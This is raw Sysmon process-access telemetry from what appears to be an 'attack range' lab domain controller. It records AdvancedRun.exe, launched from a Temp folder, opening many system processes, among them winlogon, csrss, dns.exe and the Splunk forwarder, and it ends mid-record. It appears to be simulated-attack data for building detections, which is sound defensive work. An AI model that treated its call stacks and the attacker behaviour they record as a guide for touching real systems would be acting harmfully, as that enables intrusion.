20:10:18.375{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004069019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.374{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.374{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.374{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.374{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~